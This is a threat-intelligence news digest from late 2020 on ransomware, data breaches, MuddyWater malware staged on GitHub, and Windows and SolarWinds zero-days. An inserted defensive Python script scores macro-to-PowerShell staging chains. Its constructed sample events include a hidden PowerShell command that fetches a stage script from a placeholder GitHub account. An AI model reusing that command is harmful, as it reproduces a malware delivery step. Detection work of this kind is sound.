
Cyware Daily Threat Intelligence, December 28, 2020

Microsoft-owned GitHub, one of the most popular code hosting platforms, is often abused by attackers to host malicious code. In one such incident, researchers found a new strain of malware that downloads a PowerShell script from GitHub. Linked to the MuddyWater APT group, the ultimate purpose of the attack is to execute a Cobalt Strike payload on Windows systems.

In other news, Google Project Zero has unveiled a Windows zero-day vulnerability that arises due to a previously patched flaw affecting Internet Explorer. The new flaw is related to a privilege escalation issue in splwow64.exe.

Moreover, a new zero-day flaw was identified to be a part of the well-organized SolarWinds supply chain attack, which enabled attackers to deploy the Supernova malware.

Top Breaches Reported in the Last 24 Hours

The Hospital Group targeted
Manchester-based The Hospital Group has suffered a massive ransomware attack carried out by REvil operators. The attackers claim to have stolen 600 GB of personal and financial data belonging to customers and have threatened to leak it in phases, beginning with plastic-surgery photos of patients. The group also plans to leak financial documents containing contact and personal details of patients.

Neopets leaks data
Sensitive information belonging to the Neopets website is being offered for sale on an online forum. The exposed data includes credentials needed to access company databases, employee emails, and even repositories containing the proprietary code for the site.

Koei Tecmo affected
Japanese game developer Koei Tecmo has disclosed a data breach after its stolen data was posted on a hacker forum. Following the breach, the firm has taken down its European and American websites.

Top Malware Reported in the Last 24 Hours

GitHub used to download malware
A new strain of malware, tied to the MuddyWater threat actor group, is using Word files with macros to download a PowerShell script from GitHub. The PowerShell script further downloads a legitimate image file from Imgur to execute the Cobalt Strike script on Windows systems.
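The chain described above (an Office macro spawning PowerShell, which in turn fetches a stage from public hosting such as GitHub or Imgur) leaves a distinctive process-creation footprint that defenders can alert on. The following triage script is an added example and not code from Cyware or from any of the reports it summarises; the log format, the domain list and the sample events are constructed for illustration and should be tuned to real telemetry (for example Sysmon Event ID 1 fields) before use.

```python
"""Score process-creation events for the 'Office -> script host -> public
hosting' staging pattern.  Added example; log lines and domain list are
constructed assumptions, not data from the original article."""
import re
from dataclasses import dataclass

# Parent processes that should rarely spawn script interpreters.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts commonly launched by malicious macros.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Public hosting domains abused for staging (assumption: extend per environment).
STAGING_DOMAINS = ("raw.githubusercontent.com", "github.com", "gist.github.com", "imgur.com")

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse a constructed 'Key=Value|Key=Value' process-creation record."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return ProcessEvent(fields.get("ParentImage", ""), fields.get("Image", ""),
                        fields.get("CommandLine", ""))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_staging_host(host: str) -> bool:
    """True for a listed domain or any of its subdomains (no suffix tricks)."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in STAGING_DOMAINS)


def staging_hosts(command_line: str) -> list:
    """Hosts referenced in the command line that match the staging list."""
    return [h.lower() for h in URL_HOST_RE.findall(command_line) if is_staging_host(h)]


def classify(ev: ProcessEvent) -> str:
    """Severity of a single event: high / medium / low / none."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    hosts = staging_hosts(ev.command_line)
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS and hosts:
        return "high"      # full chain: macro -> script host -> public hosting
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        return "medium"    # Office spawning a script host, no URL seen
    if child in SCRIPT_HOSTS and hosts:
        return "low"       # script host pulling from public hosting, other parent
    return "none"


def triage(lines: list) -> list:
    """Return (severity, child process, matched hosts) per input line."""
    out = []
    for line in lines:
        ev = parse_event(line)
        out.append((classify(ev), basename(ev.image), staging_hosts(ev.command_line)))
    return out


# Constructed sample events (not real telemetry); EXAMPLE-ACCOUNT is a placeholder.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -w hidden -c Invoke-WebRequest "
    r"https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/repo/main/stage.ps1",
    r"ParentImage=C:\Windows\explorer.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -c Get-ChildItem C:\Users",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|Image=C:\Windows\System32\wscript.exe"
    r"|CommandLine=wscript.exe C:\Users\Public\update.vbs",
    r"ParentImage=C:\Windows\System32\svchost.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -c Invoke-WebRequest https://i.imgur.com/EXAMPLE.png",
]

if __name__ == "__main__":
    for severity, child, hosts in triage(SAMPLE_EVENTS):
        print(f"{severity:<6} {child:<16} {','.join(hosts) or '-'}")
```

The scoring is deliberately layered: an Office parent launching a script host is already worth a medium alert on its own, because the digest's chain starts with a macro, and the public-hosting URL only raises confidence. The subdomain check compares whole labels rather than using a bare suffix match so that a look-alike domain ending in the same characters does not satisfy the rule.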

Top Vulnerabilities Reported in the Last 24 Hours

A flaw in the fix
Google Project Zero has disclosed a Windows zero-day vulnerability that arises due to an improper fix for CVE-2020-0986, a security flaw abused in a campaign dubbed Operation PowerFall. Tracked as CVE-2020-17008, the new vulnerability can be abused by changing the exploitation method for CVE-2020-0986. The flaw is likely to be patched in January 2021.

A new zero-day flaw exploited
In addition to the discovery of the new malware strain Supernova, a new zero-day vulnerability tracked as CVE-2020-10148 has come to the notice of researchers investigating SolarWinds' supply chain attack. Identified as an authentication bypass flaw, it can allow a remote attacker to execute API commands. The flaw has now been patched by SolarWinds.

Posted on: December 28, 2020
